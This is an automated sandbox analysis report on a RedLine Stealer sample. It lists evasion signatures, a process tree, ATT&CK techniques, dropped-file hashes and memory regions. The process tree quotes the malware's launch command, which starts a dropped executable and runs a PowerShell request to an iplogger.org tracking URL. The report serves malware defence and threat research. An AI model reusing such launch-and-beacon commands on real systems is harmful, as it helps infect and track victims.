Analysis

  • max time kernel
    155s
  • max time network
    167s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    15-02-2022 13:42

General

  • Target

    49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe

  • Size

    2.6MB

  • MD5

    8fbf01af64c7bb1289a26b1f7574ae9e

  • SHA1

    bcb617c6977334e789f9eace561f1c931024b32c

  • SHA256

    49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec

  • SHA512

    0cdac73d08652435e48ea05dd73cc414a212c40dcc62b96c637a2a2cd35e24aafecdc99f1c9f023089bf16c6a9dc3b87dae5d38ffa58878820ec32c1cd1fbe62

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 1 IoCs
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe
    "C:\Users\Admin\AppData\Local\Temp\49ec761dd9f05eaac28aa93ec47034f754364726542b9de7cee5d6592bf0c4ec.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4860
      • C:\Users\Admin\AppData\Local\Temp\Ww.exe
        "Ww.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:5076
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5044
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:4128
  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:3288

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

Discovery

Query Registry

2
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Ww.exe
    MD5

    55232b7cee343da1464106a4ef76e98f

    SHA1

    f2b672a29b86400d87f1f6dcde6341051770cd55

    SHA256

    96a2adaa6de0944e24be94cbf2c89e35babbea9e2cb00ddcdb560d9f33a362fc

    SHA512

    0c4bc94b9fc05cf59661a950520e9cef0a9e37c3307783cbc490d834a09852632467583b59fe836dce47b17e51407d1aa66b1b70ea8a0da3f5bf8e3a8ab13f8c

  • C:\Users\Admin\AppData\Local\Temp\nsu7CA1.tmp\HCSWCJXJIH35BU.dll
    MD5

    293165db1e46070410b4209519e67494

    SHA1

    777b96a4f74b6c34d43a4e7c7e656757d1c97f01

    SHA256

    49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

    SHA512

    97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

  • memory/4128-155-0x00000212C3920000-0x00000212C3930000-memory.dmp
    Filesize

    64KB

  • memory/4128-156-0x00000212C3980000-0x00000212C3990000-memory.dmp
    Filesize

    64KB

  • memory/4128-157-0x00000212C6050000-0x00000212C6054000-memory.dmp
    Filesize

    16KB

  • memory/5044-140-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
    Filesize

    4KB

  • memory/5044-137-0x00000000746EE000-0x00000000746EF000-memory.dmp
    Filesize

    4KB

  • memory/5044-133-0x0000000005630000-0x0000000005C58000-memory.dmp
    Filesize

    6.2MB

  • memory/5044-151-0x0000000006600000-0x000000000661E000-memory.dmp
    Filesize

    120KB

  • memory/5044-142-0x0000000004FF2000-0x0000000004FF3000-memory.dmp
    Filesize

    4KB

  • memory/5044-132-0x0000000002E90000-0x0000000002EC6000-memory.dmp
    Filesize

    216KB

  • memory/5044-143-0x00000000054D0000-0x00000000054F2000-memory.dmp
    Filesize

    136KB

  • memory/5044-144-0x0000000005DD0000-0x0000000005E36000-memory.dmp
    Filesize

    408KB

  • memory/5044-145-0x0000000005E40000-0x0000000005EA6000-memory.dmp
    Filesize

    408KB

  • memory/5044-154-0x0000000006A60000-0x0000000006A7A000-memory.dmp
    Filesize

    104KB

  • memory/5044-153-0x0000000007E70000-0x00000000084EA000-memory.dmp
    Filesize

    6.5MB

  • memory/5044-152-0x0000000004FF5000-0x0000000004FF7000-memory.dmp
    Filesize

    8KB

  • memory/5076-138-0x00000000746EE000-0x00000000746EF000-memory.dmp
    Filesize

    4KB

  • memory/5076-150-0x0000000005650000-0x000000000568C000-memory.dmp
    Filesize

    240KB

  • memory/5076-149-0x00000000035A0000-0x00000000035A1000-memory.dmp
    Filesize

    4KB

  • memory/5076-148-0x0000000005720000-0x000000000582A000-memory.dmp
    Filesize

    1.0MB

  • memory/5076-147-0x00000000055F0000-0x0000000005602000-memory.dmp
    Filesize

    72KB

  • memory/5076-146-0x0000000005C10000-0x0000000006228000-memory.dmp
    Filesize

    6.1MB

  • memory/5076-139-0x0000000077B74000-0x0000000077B76000-memory.dmp
    Filesize

    8KB

  • memory/5076-141-0x00000000003A0000-0x0000000000AA0000-memory.dmp
    Filesize

    7.0MB

  • memory/5076-136-0x00000000760E0000-0x00000000760E1000-memory.dmp
    Filesize

    4KB